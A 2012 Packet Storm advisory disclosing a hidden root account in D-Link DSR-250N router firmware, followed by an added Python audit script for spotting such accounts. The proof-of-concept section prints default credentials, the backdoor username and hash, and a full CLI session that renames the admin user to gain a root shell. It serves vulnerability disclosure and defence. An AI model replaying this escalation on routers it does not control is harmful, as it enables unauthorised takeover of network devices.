D-Link DSR-250N Backdoor

Published: 25 Nov 2012
Reported by: 0_o
Type: packetstorm
Source: packetstormsecurity.com

D-Link DSR-250N Persistent Root Access with Backdoor Use

```text
D-Link DSR-250N Persistent Root Access

#
# Router: D-Link DSR-250N
# Hardware Version: A1
# Firmware Version: 1.05B73_WW
#
# Arch: armv6l, Linux
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Date: 2012-11-25
#
# Purpose: Persistently become real root on your D-Link DSR-250N
# I just wanted to do real firewalling on this
# cigarette box, but the router software wouldn't
# let me. So it screamed after getting h@kCz0r3d.
#
# Prerequisites: admin access to CLI
#
#
# Here comes the fun stuff... :-)
#
# From the default configuration, you can log in via SSH.
# user: admin, pass: admin
#

root@bt:~# ssh admin@192.168.10.1
The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.
RSA key fingerprint is aa:66:55:ee:cc:66:ff:aa:dd:44:55:00:44:99:33:77.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.
admin@192.168.10.1's password:


BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

************************************************
Welcome to DSR-250N Command Line Interface
************************************************
D-Link DSR>

.exit Exit this session
.help Display an overview of the CLI syntax
.history Display the current session's command line history
.reboot Reboot the system.
.top Return to the default mode
dot11 [Wireless configuration Mode]
license [License configuration Mode]
net [Networking configuration mode]
qos [QoS configuration Mode]
security [Security configuration mode]
show Display system components' configuration
system [System configuration mode]
util [Utilities Mode]
vpn [VPN configuration Mode]

D-Link DSR>

#
# So you get dropped into the CLI. No shellz :(
# Let's see what we can do from here...
#

D-Link DSR> util cat /etc/passwd
root:!:0:0:root:/root:/bin/sh
ZX4q9Q9JUpwTZuo7:$1$CtRn6tvb$c3GrPDua6tg9pXFWu.9rF1:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh

#
# Ohhh, a backdoor user! Shame on you, D-Link!!!
# First, I tried to crack the hash. After 24hrs,
# I dropped that and searched for another way.
# Turns out that there are more nice functions
# available in that CLI... ;-)
#

D-Link DSR> system users edit 1
users-config[userdb]> username ZX4q9Q9JUpwTZuo7
users-config[userdb]> password newpass
users-config[userdb]> password_confirm newpass
users-config[userdb]> save

#
# Now, you will have overwritten the first user
# managed by the D-Link router software. This
# user is your current admin user. We have given him
# the username of the backdoor user and set a new
# password. You might want to add another admin
# user first and modify that.
# For this PoC, I just use default one. Let's see
# what /etc/passwd and /etc/shadow look like now...
#

users-config[userdb]> util cat /etc/passwd
root:!:0:0:root:/root:/bin/sh
ZX4q9Q9JUpwTZuo7:wq8NLLJdoSzSw:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
users-config[userdb]> util cat /etc/shadow
guest:TN08ndVLhlVok:14975:0:99999:7:::

#
# So, the MD5-Crypt hash has been replaced by a
# DES-Crypt (unix crypt) hash...
#

users-config[userdb]> exit
D-Link DSR> .exit
Connection to 192.168.10.1 closed by remote host.
Connection to 192.168.10.1 closed.

#
# Let's have a taste of the new freedom...
#

root@bt:~# ssh ZX4q9Q9JUpwTZuo7@192.168.10.1
ZX4q9Q9JUpwTZuo7@192.168.10.1's password:


BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

DSR-250N> id
uid=0(root) gid=0(root) groups=0(root)
DSR-250N> uname -a
Linux DSR-250N 2.6.31.1-cavm1 #5 Fri Sep 28 11:41:26 IST 2012 armv6l GNU/Linux
DSR-250N> ls -la /
drwxr-xr-x 18 root root 0 Jan 1 00:00 .
drwxr-xr-x 18 root root 0 Jan 1 00:00 ..
drwxr-xr-x 2 root root 0 Jan 1 00:02 bin
lrwxrwxrwx 1 root root 5 Jan 1 1970 data -> flash
drwxr-xr-x 5 root root 0 Jan 1 00:02 dev
drwxr-xr-x 12 root root 0 Jan 1 00:08 etc
drwxr-xr-x 4 root root 0 Jan 1 1970 flash
drwxr-xr-x 2 root root 0 Jan 1 1970 flash_multiboot
drwxr-xr-x 4 root root 0 Jan 1 00:01 home
lrwxrwxrwx 1 root root 10 Sep 28 2012 init -> /sbin/init
drwxr-xr-x 2 root root 0 Jan 1 00:00 lib
lrwxrwxrwx 1 root root 12 Sep 28 2012 linuxrc -> /bin/busybox
drwxr-xr-x 3 root root 0 Jan 1 1970 mnt
drwxr-xr-x 9 root root 146 Sep 28 2012 pfrm2.0
dr-xr-xr-x 71 root root 0 Jan 1 1970 proc
drwxr-xr-x 2 root root 0 Sep 28 2012 root
drwxr-xr-x 2 root root 0 Jan 1 00:01 sbin
drwxr-xr-x 11 root root 0 Jan 1 1970 sys
-rw-r--r-- 1 root root 5 Jan 1 00:00 temp
drwxrwxrwt 4 root root 380 Jan 1 00:09 tmp
drwxr-xr-x 6 root root 0 Jan 1 1970 usr
drwxrwxrwt 18 root root 1200 Jan 1 00:03 var
DSR-250N> df -h
Filesystem Size Used Available Use% Mounted on
tmpfs 61.2M 956.0K 60.3M 2% /tmp
tmpfs 61.2M 932.0K 60.3M 1% /var
tmpfs 61.2M 0 61.2M 0% /mnt/tmpfs
/dev/mtdblock3 19.5M 19.5M 0 100% /pfrm2.0
/dev/mtdblock4 2.1M 504.0K 1.6M 23% /flash
DSR-250N> echo "r00ted! :-)"
r00ted! :-)
DSR-250N> exit
Connection to 192.168.10.1 closed.
root@bt:~#

#
# Your web gui will not work until you reboot your box. Then, log
# in with the backdoor user and you will have the full admin gui back.
#
# By the way, how did they confine us to the CLI in the first place?
#

DSR-250N> cat /etc/profile
# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "ZX4q9Q9JUpwTZuo7" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '
DSR-250N>
```
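A defender-side check for the account layout shown in the two /etc/passwd dumps above, added here as an example that is not part of the original advisory and not D-Link code: a small Python audit that parses passwd lines, names the scheme in the password field (shadowed, locked, MD5-crypt, legacy DES-crypt), and flags any UID-0 account with an interactive shell that is not on an expected list. The sample inputs are constructed from the listings quoted in the writeup; the expected-root set, the interactive-shell list and the finding codes are this example's own assumptions. On the quoted data every account carries UID 0, so admin and guest are reported alongside the hidden account, which is exactly why the username test in /etc/profile was the only thing separating the CLI from a root shell.

```python
"""Audit passwd-style account data for hidden UID-0 accounts and weak hashes.

Added example for this page; not code from the original advisory or from D-Link.
The sample inputs are constructed from the /etc/passwd listings quoted above.
"""
import re

# Constructed sample: /etc/passwd as printed on the router before the rename.
PASSWD_BEFORE = """\
root:!:0:0:root:/root:/bin/sh
ZX4q9Q9JUpwTZuo7:$1$CtRn6tvb$c3GrPDua6tg9pXFWu.9rF1:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
"""

# Constructed sample: /etc/passwd as printed after "system users edit 1".
PASSWD_AFTER = """\
root:!:0:0:root:/root:/bin/sh
ZX4q9Q9JUpwTZuo7:wq8NLLJdoSzSw:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
"""

# Assumption for this example: only "root" is allowed to carry UID 0.
EXPECTED_UID0 = frozenset({"root"})
# Assumption: shells that give an interactive session when login succeeds.
INTERACTIVE_SHELLS = frozenset({"/bin/sh", "/bin/ash", "/bin/bash"})


def parse_passwd(text):
    """Split passwd lines into dicts; blank and '#' lines are ignored."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home,
                        "shell": shell})
    return entries


def classify_hash(pw):
    """Name the password-field scheme so weak or misplaced hashes stand out."""
    if pw == "":
        return "empty"          # no password at all
    if pw == "x":
        return "shadowed"       # real hash lives in /etc/shadow
    if pw == "*" or pw.startswith("!"):
        return "locked"         # password login disabled
    if pw.startswith("$1$"):
        return "md5-crypt"
    if pw.startswith("$5$"):
        return "sha256-crypt"
    if pw.startswith("$6$"):
        return "sha512-crypt"
    if re.fullmatch(r"[./0-9A-Za-z]{13}", pw):
        return "des-crypt"      # traditional crypt(3): 8-character password limit
    return "unknown"


def audit(text, expected_uid0=EXPECTED_UID0):
    """Return (account, finding) pairs for the conditions a reviewer cares about."""
    findings = []
    for e in parse_passwd(text):
        scheme = classify_hash(e["pw"])
        if (e["uid"] == 0 and e["name"] not in expected_uid0
                and e["shell"] in INTERACTIVE_SHELLS):
            findings.append((e["name"], "uid0-shell"))
        if scheme == "empty":
            findings.append((e["name"], "empty-password"))
        elif scheme not in ("shadowed", "locked"):
            # A hash in world-readable /etc/passwd can be copied by any local user.
            findings.append((e["name"], "hash-in-passwd"))
        if scheme == "des-crypt":
            findings.append((e["name"], "des-crypt"))
    return findings


def uid0_accounts(text, expected_uid0=EXPECTED_UID0):
    """Sorted names of accounts flagged as unexpected UID-0 logins."""
    return sorted({n for n, c in audit(text, expected_uid0) if c == "uid0-shell"})


if __name__ == "__main__":
    for label, sample in (("before rename", PASSWD_BEFORE),
                          ("after rename", PASSWD_AFTER)):
        print("== %s ==" % label)
        for name, code in audit(sample):
            print("  %-18s %s" % (name, code))
```

Run it against a copy of /etc/passwd pulled from the device (the CLI's `util cat /etc/passwd`, as used in the writeup, is enough) and diff the findings against a baseline taken from a freshly flashed unit; a new UID-0 name, a hash that moved from /etc/shadow into /etc/passwd, or a change of scheme from MD5-crypt to DES-crypt are each worth a look on their own.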
